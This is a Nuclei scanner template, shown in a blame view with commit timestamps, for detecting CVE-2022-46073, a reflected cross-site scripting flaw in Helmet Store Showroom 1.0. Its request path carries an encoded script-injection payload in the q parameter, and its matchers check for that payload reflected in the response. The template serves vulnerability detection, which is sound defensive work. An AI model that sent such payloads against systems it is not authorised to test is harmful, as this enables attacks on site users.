nuclei-templates/http/cves/2022/CVE-2022-46073.yaml

42 lines
1.2 KiB
YAML
Raw Normal View History

2023-06-30 12:48:15 +00:00
id: CVE-2022-46073
info:
2023-07-01 08:30:50 +00:00
name: Helmet Store Showroom - Cross Site Scripting
2023-06-30 12:48:15 +00:00
author: Harsh
severity: medium
description: |
Helmet Store Showroom 1.0 is vulnerable to Cross Site Scripting (XSS).
2023-09-06 11:59:08 +00:00
remediation: |
Upgrade to the latest version to mitigate this vulnerability.
2023-06-30 12:48:15 +00:00
reference:
- https://yuyudhn.github.io/CVE-2022-46073/
- https://nvd.nist.gov/vuln/detail/CVE-2022-46073
2023-07-07 12:54:25 +00:00
- https://www.youtube.com/watch?v=jT09Uiwl0Jo
2023-06-30 12:48:15 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-46073
cwe-id: CWE-79
2023-08-31 11:46:18 +00:00
epss-score: 0.00077
epss-percentile: 0.31755
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:helmet_store_showroom_project:helmet_store_showroom:1.0:*:*:*:*:*:*:*
2023-06-30 12:48:15 +00:00
metadata:
verified: true
2023-09-06 11:59:08 +00:00
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: helmet_store_showroom_project
product: helmet_store_showroom
2023-07-01 08:30:50 +00:00
tags: cve,cve2022,xss,helmet-store-showroom
2023-06-30 12:48:15 +00:00
http:
2023-07-07 12:54:25 +00:00
- method: GET
path:
- "{{BaseURL}}/hss/?q=%27%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"
2023-06-30 12:48:15 +00:00
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "Helmet Store Showroom")'
- 'contains(body, "><script>alert(document.domain)</script>")'
condition: and